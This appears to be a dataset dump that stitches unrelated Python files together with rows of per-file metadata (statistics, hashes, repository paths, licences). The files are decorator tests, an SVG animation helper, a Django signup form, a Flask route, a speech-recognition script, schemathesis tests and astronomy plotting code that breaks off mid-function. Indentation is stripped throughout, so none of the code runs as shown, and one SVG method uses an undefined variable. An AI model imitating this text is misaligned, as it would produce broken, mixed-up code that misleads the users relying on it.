assert "RESTING_BEFORE: 3/5 second(s) | FUNCTION: rest_before_after | ARGS: () | KWARGS: {} \n" in captured_output
assert "RESTING_BEFORE: 2/5 second(s) | FUNCTION: rest_before_after | ARGS: () | KWARGS: {} \n" in captured_output
assert "RESTING_BEFORE: 1/5 second(s) | FUNCTION: rest_before_after | ARGS: () | KWARGS: {} \n" in captured_output
assert "RESTING_AFTER: 5/5 second(s) | FUNCTION: rest_before_after | ARGS: () | KWARGS: {} \n" in captured_output
assert "RESTING_AFTER: 4/5 second(s) | FUNCTION: rest_before_after | ARGS: () | KWARGS: {} \n" in captured_output
assert "RESTING_AFTER: 3/5 second(s) | FUNCTION: rest_before_after | ARGS: () | KWARGS: {} \n" in captured_output
assert "RESTING_AFTER: 2/5 second(s) | FUNCTION: rest_before_after | ARGS: () | KWARGS: {} \n" in captured_output
assert "RESTING_AFTER: 1/5 second(s) | FUNCTION: rest_before_after | ARGS: () | KWARGS: {} \n" in captured_output
assert rest_before_after.__name__ == "rest_before_after" # Important for decorators to not override method name
def test_bvr_rest_before_after_with_countdown_true_and_non_default_seconds(capsys):
@bvr_rest_before_after(seconds=2, countdown=True)
def rest_before_after():
return 2
return_value = rest_before_after()
captured_output = capsys.readouterr().out
assert return_value == 2
assert "RESTING_BEFORE: 2/2 second(s) | FUNCTION: rest_before_after | ARGS: () | KWARGS: {} \n" in captured_output
assert "RESTING_BEFORE: 1/2 second(s) | FUNCTION: rest_before_after | ARGS: () | KWARGS: {} \n" in captured_output
assert "RESTING_AFTER: 2/2 second(s) | FUNCTION: rest_before_after | ARGS: () | KWARGS: {} \n" in captured_output
assert "RESTING_AFTER: 1/2 second(s) | FUNCTION: rest_before_after | ARGS: () | KWARGS: {} \n" in captured_output
assert rest_before_after.__name__ == "rest_before_after" # Important for decorators to not override method name
def test_bvr_rest_before_after_with_countdown_false_and_non_default_seconds(capsys):
@bvr_rest_before_after(seconds=2)
def rest_before_after():
print('Hello')
return 2
return_value = rest_before_after()
captured_output = capsys.readouterr().out
assert return_value == 2
assert "RESTING_BEFORE: 2 second(s) | FUNCTION: rest_before_after | ARGS: () | KWARGS: {} \nHello\n" in captured_output
assert "RESTING_AFTER: 2 second(s) | FUNCTION: rest_before_after | ARGS: () | KWARGS: {} " in captured_output
assert rest_before_after.__name__ == "rest_before_after" # Important for decorators to not override method name
def test_bvr_rest_before_after_should_case_float_to_int(capsys):
@bvr_rest_before_after(seconds=2.23)
def rest_before_after():
print('Hello')
return 2
return_value = rest_before_after()
captured_output = capsys.readouterr().out
assert return_value == 2
assert "RESTING_BEFORE: 2 second(s) | FUNCTION: rest_before_after | ARGS: () | KWARGS: {} \nHello" in captured_output
assert "RESTING_AFTER: 2 second(s) | FUNCTION: rest_before_after | ARGS: () | KWARGS: {} " in captured_output
assert rest_before_after.__name__ == "rest_before_after" # Important for decorators to not override method name
| 41.632979
| 136
| 0.722755
| 1,071
| 7,827
| 4.906629
| 0.056022
| 0.173168
| 0.259753
| 0.108468
| 0.991056
| 0.983064
| 0.983064
| 0.976974
| 0.976784
| 0.970504
| 0
| 0.009437
| 0.174141
| 7,827
| 187
| 137
| 41.855615
| 0.803527
| 0.067587
| 0
| 0.735043
| 0
| 0.222222
| 0.391245
| 0
| 0
| 0
| 0
| 0
| 0.42735
| 1
| 0.17094
| false
| 0
| 0.008547
| 0.034188
| 0.264957
| 0.051282
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
e79b647eaa52b87897030e594944e1286c2d77a5
| 7,637
|
py
|
Python
|
src/pydae/svg_tools.py
|
pydae/pydae
|
8076bcfeb2cdc865a5fc58561ff8d246d0ed7d9d
|
[
"MIT"
] | 1
|
2020-12-20T03:45:26.000Z
|
2020-12-20T03:45:26.000Z
|
src/pydae/svg_tools.py
|
pydae/pydae
|
8076bcfeb2cdc865a5fc58561ff8d246d0ed7d9d
|
[
"MIT"
] | null | null | null |
src/pydae/svg_tools.py
|
pydae/pydae
|
8076bcfeb2cdc865a5fc58561ff8d246d0ed7d9d
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Wed Feb 3 10:33:57 2021
@author: jmmau
"""
from xml.etree import ElementTree as ET
import numpy as np
class svg():
def __init__(self,input_file):
ET.register_namespace("","http://www.w3.org/2000/svg")
ET.register_namespace("inkscape","http://www.inkscape.org/namespaces/inkscape")
ET.register_namespace("sodipodi","http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd")
ET.register_namespace("cc","http://creativecommons.org/ns#")
ET.register_namespace("rdf","http://www.w3.org/1999/02/22-rdf-syntax-ns#")
self.tree = ET.parse(input_file)
self.root = self.tree.getroot()
self.g_list = self.root.findall(".//{http://www.w3.org/2000/svg}g")
self.N_steps = 1000
self.input_file = input_file
self.begin_click = False
self.begin = ''
self.anim_id = ''
self.anim_i = 0
def set_size(self,width,height):
self.root.attrib['width'] = f'{width}px'
self.root.attrib['height'] = f'{height}px'
def save(self,output_file=''):
if output_file=='':
output_file = f"{self.input_file.replace('.svg','')}_anim.svg"
self.tree.write(output_file)
def set_text(self,text_id,string):
for text in self.root.findall('.//{http://www.w3.org/2000/svg}text'):
if text.attrib['id'] == text_id: text_obj = text
for tspan in text_obj.findall('.//{http://www.w3.org/2000/svg}tspan'):
tspan.text = string
def set_title(self,element_id,string):
for text in self.root.findall('.//{http://www.w3.org/2000/svg}text'):
if text.attrib['id'] == text_id: text_obj = text
for tspan in text_obj.findall('.//{http://www.w3.org/2000/svg}tspan'):
tspan.text = string
class animatesvg():
def __init__(self,input_file,group_id):
ET.register_namespace("","http://www.w3.org/2000/svg")
ET.register_namespace("inkscape","http://www.inkscape.org/namespaces/inkscape")
ET.register_namespace("sodipodi","http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd")
ET.register_namespace("cc","http://creativecommons.org/ns#")
ET.register_namespace("rdf","http://www.w3.org/1999/02/22-rdf-syntax-ns#")
self.tree = ET.parse(input_file)
self.root = self.tree.getroot()
self.g_list = self.root.findall(".//{http://www.w3.org/2000/svg}g")
self.group_id = group_id
self.N_steps = 1000
self.input_file = input_file
self.begin_click = False
self.begin = ''
self.anim_id = ''
self.anim_i = 0
def set_size(self,width,height):
self.root.attrib['width'] = f'{width}px'
self.root.attrib['height'] = f'{height}px'
def rotate(self,times,angle,x,y):
if type(x) == float:
x = times*0+x
if type(y) == float:
y = times*0+y
t_end = times[-1]
N_t = len(times)
keyTimes = ""
keyPoints = ""
for it in range(N_t):
keyTimes += f'{times[it]/t_end};'
keyPoints += f'{angle[it]},{x[it]},{y[it]};'
keyTimes = keyTimes[:-1].replace("'",'"')
keyPoints = keyPoints[:-1].replace("'",'"')
for item in self.g_list:
if item.attrib['id'] == self.group_id:
anim = ET.Element("animateTransform")
if self.anim_id != '':
anim.set('id',self.anim_id)
anim.set('calcMode',"linear")
anim.set('additive',"sum")
anim.set('attributeType',"xml")
anim.set('attributeName',"transform")
anim.set('type',"rotate")
anim.set('dur',f"{t_end}s")
anim.set('fill',"freeze")
#anim.set('repeatCount',"indefinite")
if self.begin != '':
anim.set('begin',self.begin)
if self.begin_click:
anim.set('begin',"click")
anim.set('values',f"{keyPoints}")
anim.set('keyTimes',f"{keyTimes}")
item.insert(0, anim)
def translate(self,times,x,y):
t_end = times[-1]
N_t = len(times)
keyTimes = ""
keyPoints = ""
for it in range(N_t):
keyTimes += f'{times[it]/t_end:0.5f};'
keyPoints += f'{float(x[it]):0.3f},{float(y[it]):0.3f};'
keyTimes = keyTimes[:-1].replace("'",'"')
keyPoints = keyPoints[:-1].replace("'",'"')
for item in self.g_list:
if item.attrib['id'] == self.group_id:
anim = ET.Element("animateTransform")
if self.anim_id != '':
anim.set('id',self.anim_id)
anim.set('calcMode',"linear")
anim.set('additive',"sum")
anim.set('attributeType',"xml")
anim.set('attributeName',"transform")
anim.set('type',"translate")
anim.set('dur',f"{t_end}s")
anim.set('fill',"freeze")
#anim.set('repeatCount',"indefinite")
if self.begin != '':
anim.set('begin',self.begin)
if self.begin_click:
anim.set('begin',"click")
anim.set('values',f"{keyPoints}")
anim.set('keyTimes',f"{keyTimes}")
item.insert(0, anim)
def scale(self,times,x_0,y_0,sx,sy):
t_end = times[-1]
N_t = len(times)
keyTimes = ""
keyPoints = ""
for it in range(N_t):
keyTimes += f'{times[it]/t_end:0.5f};'
keyPoints += f'{sx[it]:0.3f},{sy[it]:0.3f};'
keyTimes = keyTimes[:-1].replace("'",'"')
keyPoints = keyPoints[:-1].replace("'",'"')
for item in self.g_list:
if item.attrib['id'] == self.group_id:
anim = ET.Element("animateTransform")
if self.anim_id != '':
anim.set('id',self.anim_id)
anim.set('calcMode',"linear")
anim.set('additive',"sum")
anim.set('attributeType',"xml")
anim.set('attributeName',"transform")
anim.set('type',"scale")
anim.set('dur',f"{t_end}s")
anim.set('fill',"freeze")
#anim.set('repeatCount',"indefinite")
if self.begin != '':
anim.set('begin',self.begin)
if self.begin_click:
anim.set('begin',"click")
anim.set('values',f"{keyPoints}")
anim.set('keyTimes',f"{keyTimes}")
item.insert(0, anim)
x = times*0+x_0*(1-sx)
y = times*0+y_0*(1-sy)
self.translate(times,x,y)
def save(self,output_file=''):
if output_file=='':
output_file = f"{self.input_file.replace('.svg','')}_anim.svg"
self.tree.write(output_file)
def reduce(self,times,values):
N_t = len(times)
mask_values = values
mask = np.array([True]*N_t)
increment = np.abs((mask_values.max()-mask_values.min())/self.N_steps)
mask[0:(N_t-1)] = np.abs(np.diff(mask_values))>increment
mask[0] = True
mask[-1] = True
self.mask = mask
self.increment = increment
return self.mask
| 38.964286
| 95
| 0.509493
| 935
| 7,637
| 4.049198
| 0.147594
| 0.072108
| 0.050185
| 0.031696
| 0.839144
| 0.828579
| 0.828579
| 0.828579
| 0.828579
| 0.828579
| 0
| 0.023148
| 0.321199
| 7,637
| 196
| 96
| 38.964286
| 0.707176
| 0.024093
| 0
| 0.780488
| 0
| 0.006098
| 0.195109
| 0.031174
| 0
| 0
| 0
| 0
| 0
| 1
| 0.073171
| false
| 0
| 0.012195
| 0
| 0.103659
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e7d9f26a4668107694a3683bcff21989f67cc9ad
| 251
|
py
|
Python
|
accounts/forms.py
|
jitendrapitchuka/Recommendation_system
|
82baf8c38a5c1ec1e37fc95305c8bd4a92703a6c
|
[
"MIT"
] | 1
|
2021-11-02T06:15:06.000Z
|
2021-11-02T06:15:06.000Z
|
accounts/forms.py
|
jitendrapitchuka/recommendation_system
|
82baf8c38a5c1ec1e37fc95305c8bd4a92703a6c
|
[
"MIT"
] | null | null | null |
accounts/forms.py
|
jitendrapitchuka/recommendation_system
|
82baf8c38a5c1ec1e37fc95305c8bd4a92703a6c
|
[
"MIT"
] | null | null | null |
from django.contrib.auth import get_user_model
from django.contrib.auth.forms import UserCreationForm
class UserCreateForm(UserCreationForm):
class Meta:
fields=('username','email','password1','password2')
model=get_user_model()
| 27.888889
| 59
| 0.752988
| 29
| 251
| 6.37931
| 0.62069
| 0.108108
| 0.183784
| 0.227027
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.009302
| 0.143426
| 251
| 9
| 60
| 27.888889
| 0.851163
| 0
| 0
| 0
| 0
| 0
| 0.123016
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.166667
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
99b07686f3c72738fa70cead4d047b6d62d903fb
| 122
|
py
|
Python
|
app/home/routes.py
|
rudSarkar/networking-lab-project
|
077d8b6af0cf04f50ea14c55f9940c665b2450be
|
[
"MIT"
] | null | null | null |
app/home/routes.py
|
rudSarkar/networking-lab-project
|
077d8b6af0cf04f50ea14c55f9940c665b2450be
|
[
"MIT"
] | null | null | null |
app/home/routes.py
|
rudSarkar/networking-lab-project
|
077d8b6af0cf04f50ea14c55f9940c665b2450be
|
[
"MIT"
] | null | null | null |
from flask import render_template
from . import home
@home.route('/')
def index():
return render_template('index.html')
| 17.428571
| 37
| 0.745902
| 17
| 122
| 5.235294
| 0.647059
| 0.314607
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.122951
| 122
| 7
| 37
| 17.428571
| 0.831776
| 0
| 0
| 0
| 0
| 0
| 0.089431
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| true
| 0
| 0.4
| 0.2
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
99ccc58806e3be4484288d8db1cdf34aa29c2661
| 860
|
py
|
Python
|
resources/views/pythonCode.py
|
nikita191998/voiceEnabledFormFilling
|
16f2cb72826814f75cd73280cb4bd86f2a06d456
|
[
"MIT"
] | 3
|
2020-10-05T15:58:00.000Z
|
2020-10-26T17:27:43.000Z
|
resources/views/pythonCode.py
|
nikita191998/voiceEnabledFormFilling
|
16f2cb72826814f75cd73280cb4bd86f2a06d456
|
[
"MIT"
] | null | null | null |
resources/views/pythonCode.py
|
nikita191998/voiceEnabledFormFilling
|
16f2cb72826814f75cd73280cb4bd86f2a06d456
|
[
"MIT"
] | null | null | null |
import speech_recognition as sr
def SpeechToText():
r= sr.Recognizer()
with sr.Microphone() as source:
Text= 'Nothing'
print('say something')
audio = r.listen(source)
print('Time over, Thanks')
try:
Text = r.recognize_google(audio, language="en-IN")
print('Text: '+r.recognize_google(audio, language="en-IN"))
except:
pass
return Text
def Speech():
r= sr.Recognizer()
with sr.Microphone() as source:
Text= 'Nothing'
print('say something')
audio = r.listen(source)
print('Time over, Thanks')
try:
Text = r.recognize_google(audio, language="hi-IN")
print('Text: '+r.recognize_google(audio, language="hi-IN"))
except:
pass
return Text
| 26.875
| 71
| 0.539535
| 95
| 860
| 4.831579
| 0.336842
| 0.043573
| 0.122004
| 0.174292
| 0.888889
| 0.801743
| 0.801743
| 0.801743
| 0.601307
| 0.601307
| 0
| 0
| 0.339535
| 860
| 31
| 72
| 27.741935
| 0.808099
| 0
| 0
| 0.740741
| 0
| 0
| 0.123256
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.074074
| false
| 0.074074
| 0.037037
| 0
| 0.185185
| 0.222222
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
99f350a767a3765e043b512c36ca57a93132c3d8
| 3,067
|
py
|
Python
|
test/test_pytest.py
|
chr1st1ank/schemathesis
|
f2e160d56c1fdce9eac7fee5875b209c8944f54a
|
[
"MIT"
] | null | null | null |
test/test_pytest.py
|
chr1st1ank/schemathesis
|
f2e160d56c1fdce9eac7fee5875b209c8944f54a
|
[
"MIT"
] | null | null | null |
test/test_pytest.py
|
chr1st1ank/schemathesis
|
f2e160d56c1fdce9eac7fee5875b209c8944f54a
|
[
"MIT"
] | null | null | null |
def test_pytest_parametrize_fixture(testdir):
# When `pytest_generate_tests` is used on a module level for fixture parametrization
testdir.make_test(
"""
def pytest_generate_tests(metafunc):
metafunc.parametrize("inner", ("A", "B"))
@pytest.fixture()
def param(inner):
return inner * 2
@schema.parametrize()
def test_(request, param, case):
request.config.HYPOTHESIS_CASES += 1
assert case.path == "/v1/users"
assert case.method in ("GET", "POST")
""",
paths={
"/users": {
"get": {"responses": {"200": {"description": "OK"}}},
"post": {"responses": {"200": {"description": "OK"}}},
}
},
)
# And there are multiple method/endpoint combinations
result = testdir.runpytest("-v", "-s")
# Then the total number of tests should be Method/Endpoint combos x parameters in `pytest_generate_tests`
# I.e. regular pytest parametrization logic should be applied
result.assert_outcomes(passed=4)
result.stdout.re_match_lines(
[
r"test_pytest_parametrize_fixture.py::test_\[GET:/v1/users\]\[A\] PASSED",
r"test_pytest_parametrize_fixture.py::test_\[GET:/v1/users\]\[B\] PASSED",
r"test_pytest_parametrize_fixture.py::test_\[POST:/v1/users\]\[A\] PASSED",
r"test_pytest_parametrize_fixture.py::test_\[POST:/v1/users\]\[B\] PASSED",
r"Hypothesis calls: 4",
]
)
def test_pytest_parametrize_class_fixture(testdir):
# When `pytest_generate_tests` is used on a class level for fixture parametrization
testdir.make_test(
"""
class TestAPI:
def pytest_generate_tests(self, metafunc):
metafunc.parametrize("inner", ("A", "B"))
@pytest.fixture()
def param(self, inner):
return inner * 2
@schema.parametrize()
def test_(self, request, param, case):
request.config.HYPOTHESIS_CASES += 1
assert case.path == "/v1/users"
assert case.method in ("GET", "POST")
""",
paths={
"/users": {
"get": {"responses": {"200": {"description": "OK"}}},
"post": {"responses": {"200": {"description": "OK"}}},
}
},
)
# And there are multiple method/endpoint combinations
result = testdir.runpytest("-v", "-s")
# Then the total number of tests should be Method/Endpoint combos x parameters in `pytest_generate_tests`
# I.e. regular pytest parametrization logic should be applied
result.assert_outcomes(passed=4)
result.stdout.re_match_lines(
[
r"test_pytest_parametrize_class_fixture.py::TestAPI::test_\[GET:/v1/users\]\[A\] PASSED",
r"test_pytest_parametrize_class_fixture.py::TestAPI::test_\[GET:/v1/users\]\[B\] PASSED",
r"test_pytest_parametrize_class_fixture.py::TestAPI::test_\[POST:/v1/users\]\[A\] PASSED",
r"test_pytest_parametrize_class_fixture.py::TestAPI::test_\[POST:/v1/users\]\[B\] PASSED",
r"Hypothesis calls: 4",
]
)
| 37.864198
| 109
| 0.619824
| 364
| 3,067
| 5.038462
| 0.225275
| 0.054526
| 0.114504
| 0.095965
| 0.942203
| 0.928026
| 0.928026
| 0.878953
| 0.834242
| 0.834242
| 0
| 0.012728
| 0.231497
| 3,067
| 80
| 110
| 38.3375
| 0.76538
| 0.194327
| 0
| 0.428571
| 1
| 0
| 0.456946
| 0.326062
| 0
| 0
| 0
| 0
| 0.047619
| 1
| 0.047619
| false
| 0.238095
| 0
| 0
| 0.047619
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
82399fe14dbb9a8330d25752edc90d2578b98432
| 15,626
|
py
|
Python
|
independent/plot.py
|
jacobbieker/Wide_ASPECS
|
79ba3f9d42861ebdd9b731b7c4a41857a04cef40
|
[
"MIT"
] | null | null | null |
independent/plot.py
|
jacobbieker/Wide_ASPECS
|
79ba3f9d42861ebdd9b731b7c4a41857a04cef40
|
[
"MIT"
] | null | null | null |
independent/plot.py
|
jacobbieker/Wide_ASPECS
|
79ba3f9d42861ebdd9b731b7c4a41857a04cef40
|
[
"MIT"
] | null | null | null |
"""
This is focused on the plotting, both of cutouts, SN, and others
"""
import numpy as np
import matplotlib.pyplot as plt
def plot_signal_to_noise():
return NotImplementedError
def plot_single_cutout():
return NotImplementedError
def plot_multiple_cutouts():
return NotImplementedError
def plot_mstar_vs_sfr_third(aspecs_catalog, only_aspecs_match_catalog, matched_catalog, snr_limit, max_z=0.3, labels=('All', 'ASPECS', 'ASPECS CO\n Magphys'), z_lows=(0.0, 1.1, 2.2, 3), z_highs=(0.4, 1.8, 3, 4.4), colors=('lightgrey', 'red', 'orange', 'green'), filename="", z_name="z_co", added_thing="", type='square'):
"""
Given a set of catalogs, plot them with labels in a M* by SFR overlaid with best fits
Does perform cuts and errors on the catalogs
:param z_lows:
:param z_highs:
:param type:
:return:
"""
f, ((ax1, ax2), (ax3, ax4)) = plt.subplots(2, 2, sharex='all', sharey='all')
for index, z_range in enumerate(zip(z_lows, z_highs)):
use_labels = False
if index == 0:
ax = ax1
use_labels = True
elif index == 1:
ax = ax2
use_labels = False
elif index == 2:
ax = ax3
use_labels = False
else:
ax = ax4
use_labels = False
# Calculate and make the Main Sequence Plots
# Do it for the mid point of the range
mid_range_z = (z_range[1] + z_range[0]) / 2.
whitaker_dotted = False
whitaker_mass, whitaker_sfr = whitaker_main_sequence(mid_range_z, 6., 12.)
schrieber_mass, schrieber_sfr = schrieber_main_sequence(mid_range_z, 6., 12.)
if mid_range_z < 0.5 or mid_range_z > 2.5:
whitaker_dotted = True
if use_labels:
ax.plot(schrieber_mass, schrieber_sfr, color='green', label='S15', zorder=20)
if whitaker_dotted:
ax.plot(whitaker_mass, whitaker_sfr, color='orange', label='W14', linestyle='dashed',
zorder=20)
else:
ax.plot(whitaker_mass, whitaker_sfr, color='orange', label='W14', zorder=20)
ax.plot(schrieber_mass, schrieber_sfr, color='green', zorder=20)
if whitaker_dotted:
ax.plot(whitaker_mass, whitaker_sfr, color='orange', linestyle='dashed', zorder=20)
else:
ax.plot(whitaker_mass, whitaker_sfr, color='orange', zorder=20)
sfr, sfr_error, sfr_z = create_points_and_error_by_z("SFR", matched_catalog, z_range[0], z_range[1], added="_1")
mstar, mstar_error, mstar_z = create_points_and_error_by_z("Mstar", matched_catalog, z_range[0], z_range[1], added="_1")
if use_labels:
ax.errorbar(mstar, sfr, yerr=sfr_error, xerr=mstar_error, ecolor=colors[0], label=labels[0], mec='darkgrey', fmt='.', ms=1, elinewidth=1)
else:
ax.errorbar(mstar, sfr, yerr=sfr_error, xerr=mstar_error, ecolor=colors[0], fmt='.', mec='darkgrey', ms=1, elinewidth=1)
sfr, sfr_error, sfr_z = create_points_and_error_by_z("SFR", aspecs_catalog, z_range[0], z_range[1], z=z_name, added="_1")
mstar, mstar_error, mstar_z = create_points_and_error_by_z("Mstar", aspecs_catalog, z_range[0], z_range[1], z=z_name, added="_1")
if use_labels:
ax.errorbar(mstar, sfr, yerr=sfr_error, xerr=mstar_error, ecolor=colors[1], label=labels[1], fmt='.', ms=5, mec='red', zorder=20, elinewidth=1)
else:
ax.errorbar(mstar, sfr, yerr=sfr_error, xerr=mstar_error, ecolor=colors[1], fmt='.', ms=5, mec='red', zorder=20, elinewidth=1)
sfr, sfr_error, sfr_z = create_points_and_error_by_z("SFR", only_aspecs_match_catalog, z_range[0], z_range[1], added=added_thing, z=z_name)
mstar, mstar_error, mstar_z = create_points_and_error_by_z("Mstar", only_aspecs_match_catalog, z_range[0], z_range[1], added=added_thing, z=z_name)
if use_labels:
ax.errorbar(mstar, sfr, yerr=sfr_error, xerr=mstar_error, ecolor='blue', label=labels[2], fmt='.', ms=5, mec='blue', zorder=20, elinewidth=1)
else:
ax.errorbar(mstar, sfr, yerr=sfr_error, xerr=mstar_error, ecolor='blue', fmt='.', ms=5, mec='blue', zorder=20, elinewidth=1)
ax.set_title(str(np.round(z_range[0], 1)) + ' < Z < ' + str(np.round(z_range[1], 1)))
if use_labels:
handles, ax_labels = ax.get_legend_handles_labels()
f.legend(loc='best', handles=handles, labels=ax_labels, prop={'size': 6})
f.text(0.5, 0.01, 'Log(M*)', ha='center')
f.text(0.01, 0.5, 'Log(SFR)', va='center', rotation='vertical')
f.savefig(filename, bbox_inches='tight', dpi=300)
f.show()
def plot_mstar_vs_sfr(aspecs_catalog, matched_catalog, snr_limit, max_z=0.3, labels=('All', 'ASPECS'), z_lows=(0.0, 1.1, 2.2, 3), z_highs=(0.4, 1.8, 3, 4.4), colors=('lightgrey', 'red', 'orange', 'green'), filename="", type='square'):
"""
Given a set of catalogs, plot them with labels in a M* by SFR overlaid with best fits
Does perform cuts and errors on the catalogs
:param z_lows:
:param z_highs:
:param type:
:return:
"""
f, ((ax1, ax2), (ax3, ax4)) = plt.subplots(2, 2, sharex='all', sharey='all')
for index, z_range in enumerate(zip(z_lows, z_highs)):
use_labels = False
if index == 0:
ax = ax1
use_labels = True
elif index == 1:
ax = ax2
use_labels = False
elif index == 2:
ax = ax3
use_labels = False
else:
ax = ax4
use_labels = False
# Calculate and make the Main Sequence Plots
# Do it for the mid point of the range
mid_range_z = (z_range[1] + z_range[0]) / 2.
whitaker_dotted = False
whitaker_mass, whitaker_sfr = whitaker_main_sequence(mid_range_z, 6., 12.)
schrieber_mass, schrieber_sfr = schrieber_main_sequence(mid_range_z, 6., 12.)
if mid_range_z < 0.5 or mid_range_z > 2.5:
whitaker_dotted = True
if use_labels:
ax.plot(schrieber_mass, schrieber_sfr, color='green', label='S15', zorder=20)
if whitaker_dotted:
ax.plot(whitaker_mass, whitaker_sfr, color='orange', label='W14', linestyle='dashed',
zorder=20)
else:
ax.plot(whitaker_mass, whitaker_sfr, color='orange', label='W14', zorder=20)
ax.plot(schrieber_mass, schrieber_sfr, color='green', zorder=20)
if whitaker_dotted:
ax.plot(whitaker_mass, whitaker_sfr, color='orange', linestyle='dashed', zorder=20)
else:
ax.plot(whitaker_mass, whitaker_sfr, color='orange', zorder=20)
sfr, sfr_error, sfr_z = create_points_and_error_by_z("SFR", matched_catalog, z_range[0], z_range[1])
mstar, mstar_error, mstar_z = create_points_and_error_by_z("Mstar", matched_catalog, z_range[0], z_range[1])
if use_labels:
ax.errorbar(mstar, sfr, yerr=sfr_error, xerr=mstar_error, ecolor=colors[0], label=labels[0], mec='darkgrey', fmt='.', ms=1, elinewidth=1)
else:
ax.errorbar(mstar, sfr, yerr=sfr_error, xerr=mstar_error, ecolor=colors[0], fmt='.', mec='darkgrey', ms=1, elinewidth=1)
sfr, sfr_error, sfr_z = create_points_and_error_by_z("SFR", aspecs_catalog, z_range[0]-max_z, z_range[1]+max_z)
mstar, mstar_error, mstar_z = create_points_and_error_by_z("Mstar", aspecs_catalog, z_range[0]-max_z, z_range[1]+max_z)
if use_labels:
ax.errorbar(mstar, sfr, yerr=sfr_error, xerr=mstar_error, ecolor=colors[1], label=labels[1], fmt='.', ms=5, mec='red', zorder=20, elinewidth=1)
else:
ax.errorbar(mstar, sfr, yerr=sfr_error, xerr=mstar_error, ecolor=colors[1], fmt='.', ms=5, mec='red', zorder=20, elinewidth=1)
ax.set_title(str(np.round(z_range[0], 1)) + ' < Z < ' + str(np.round(z_range[1], 1)))
if use_labels:
handles, ax_labels = ax.get_legend_handles_labels()
f.legend(loc='best', handles=handles, labels=ax_labels, prop={'size': 6})
f.text(0.5, 0.01, 'Log(M*)', ha='center')
f.text(0.01, 0.5, 'Log(SFR)', va='center', rotation='vertical')
f.savefig(filename, bbox_inches='tight', dpi=300)
f.show()
def plot_mstar_vs_sfr_specz(spec_z_catalog, matched_catalog, no_spec_z_catalog, snr_limit, max_z=0.3, labels=('All', 'ASPECS Spec Z', 'ASPECS Photo Z'), z_lows=(0.0, 1.1, 2.2, 3), z_highs=(0.4, 1.8, 3, 4.4), colors=('lightgrey', 'red', 'blue', 'orange', 'green'), filename="", type='square'):
"""
Given a set of catalogs, plot them with labels in a M* by SFR overlaid with best fits
Does perform cuts and errors on the catalogs
:param z_lows:
:param z_highs:
:param type:
:return:
"""
f, ((ax1, ax2), (ax3, ax4)) = plt.subplots(2, 2, sharex='all', sharey='all')
for index, z_range in enumerate(zip(z_lows, z_highs)):
use_labels = False
if index == 0:
ax = ax1
use_labels = True
elif index == 1:
ax = ax2
use_labels = False
elif index == 2:
ax = ax3
use_labels = False
else:
ax = ax4
use_labels = False
# Calculate and make the Main Sequence Plots
# Do it for the mid point of the range
mid_range_z = (z_range[1] + z_range[0]) / 2.
whitaker_dotted = False
whitaker_mass, whitaker_sfr = whitaker_main_sequence(mid_range_z, 6., 12.)
schrieber_mass, schrieber_sfr = schrieber_main_sequence(mid_range_z, 6., 12.)
if mid_range_z < 0.5 or mid_range_z > 2.5:
whitaker_dotted = True
if use_labels:
ax.plot(schrieber_mass, schrieber_sfr, color='green', label='S15', zorder=20)
if whitaker_dotted:
ax.plot(whitaker_mass, whitaker_sfr, color='orange', label='W14', linestyle='dashed',
zorder=20)
else:
ax.plot(whitaker_mass, whitaker_sfr, color='orange', label='W14', zorder=20)
ax.plot(schrieber_mass, schrieber_sfr, color='green', zorder=20)
if whitaker_dotted:
ax.plot(whitaker_mass, whitaker_sfr, color='orange', linestyle='dashed', zorder=20)
else:
ax.plot(whitaker_mass, whitaker_sfr, color='orange', zorder=20)
sfr, sfr_error, sfr_z = create_points_and_error_by_z("SFR", matched_catalog, z_range[0], z_range[1])
mstar, mstar_error, mstar_z = create_points_and_error_by_z("Mstar", matched_catalog, z_range[0], z_range[1])
if use_labels:
ax.errorbar(mstar, sfr, yerr=sfr_error, xerr=mstar_error, ecolor=colors[0], label=labels[0], mec='darkgrey', fmt='.', ms=1, elinewidth=1)
else:
ax.errorbar(mstar, sfr, yerr=sfr_error, xerr=mstar_error, ecolor=colors[0], fmt='.', mec='darkgrey', ms=1, elinewidth=1)
